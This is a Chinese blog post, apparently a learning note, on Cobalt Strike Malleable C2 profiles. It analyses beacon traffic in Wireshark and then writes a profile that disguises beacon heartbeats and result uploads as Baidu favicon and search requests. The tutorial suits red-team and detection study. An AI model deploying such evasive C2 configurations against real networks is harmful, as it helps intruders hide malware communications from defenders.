zoukankan      html  css  js  c++  java
  • C2Profile学习

     
    使用的Profile文件内容为
     

    set sleeptime "10000";
    
    set jitter    "0";
    
    set maxdns    "255";
    
    set sample_name "Cobalt Strike Beacon (Default)";
    
    http-get {
        set uri "/pixel";
    
        client {
            metadata {
                base64;
                header "Cookie";
            }
        }
    
        server {
            header "Content-Type" "application/octet-stream";
            output {
                base64;
                print;
            }
        }
    }
    
    
    http-post {
        set uri "/submit.php";
    
        client {
            header "Content-Type" "application/octet-stream";
    
            # transmit our session identifier as /submit.php?id=[identifier]
            id {
                parameter "id";
            }
    
            # post our output with no real changes
            output {
                base64;
                print;
            }
        }
    
        # The server's response to our HTTP POST
        server {
            header "Content-Type" "text/html";
    
            # this will just print an empty string, meh...
            output {
                base64;
                print;
            }
        }
    }
    

    分析Beacon端流量特征

     
    生成一个 Http 的木马,受害者机器执行,观察WireShark中的流量特征
     

     
    首先会 GET 请求 xf1N 路径,因为我们生成的木马是 stager 功能并不齐全,需要在额外加载 stage
     

     
    前面数百个Tcp包就是我们发送的 stage
     
    之后每隔一段时间受害者机器就会发送心跳包(包含元数据等)
     

     
    受害者访问 pixel 路径,然后在Cookie里面包含一些结果Base64加密的数据,具体的分析参考: https://wbglil.gitbook.io/cobalt-strike/cobalt-strike-yuan-li-jie-shao/cs-mu-biao-shang-xian-guo-cheng

     

     
    之后的每隔一段时间就会发送类似的心跳包
     
    试试执行下命令
     

     

     
    仍然是一个心跳包,但是我们的返回包中有一些加密后的信息,一个就是服务端下发到beacon的命令
     

     
    执行完成会后就会将结果发送到 submit.php
     
    以上就是Beacon简单的流量分析过程
     
    同样的我们内存中加载程序也是一样的过程
     

     

     

    编写C2Profile

     
    可以参考一些开源的项目的Profile,例如 https://github.com/threatexpress/malleable-c2
     
    一个简单模拟百度的Profile
     

    # 设置延时时间 60s
    set sleeptime "60000";
    
    set jitter "0";
    
    set maxdns "255";
    
    set sample_name "BaiDu_Test";
    
    set useragent "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40";
    
    http-get{
        set uri "/favicon.ico";#设置心跳包的回连uri
        client{#
            metadata{
                base64;
                prepend "BIDUPSID=";
                header "Cookie";
            }
        }
        server{
            header "Content-Type" "image/x-icon";
            header "Server" "Server";
            header "Bdqid" "0xf4caeb9b0006d466";
            output {
                base64;
                print;
            }
        }
    
    }
    
    
    http-post{
        set uri "/search";
        client {
            header "Content-Type" "application/octet-stream";
            id{
                parameter "id";
            }
            output{
                base64;
                print;
            }
        }
    
        server{
            header "Content-Type" "text/html";
            output {
                base64;
                print;
            }
        }
    }
    

     

  • 相关阅读:
    从程序员到技术总监,分享10年开发经验
    CF739E Gosha is hunting
    hdu 4891 模拟
    hdu4888 最大流(构造矩阵)
    hdu4888 最大流(构造矩阵)
    hdu4885 有 限制的最短路
    hdu4885 有 限制的最短路
    hdu4884 模拟
    hdu4884 模拟
    POJ1789简单小生成树
  • 原文地址:https://www.cnblogs.com/Mikasa-Ackerman/p/c2profile-xue-xi.html
Copyright © 2011-2022 走看看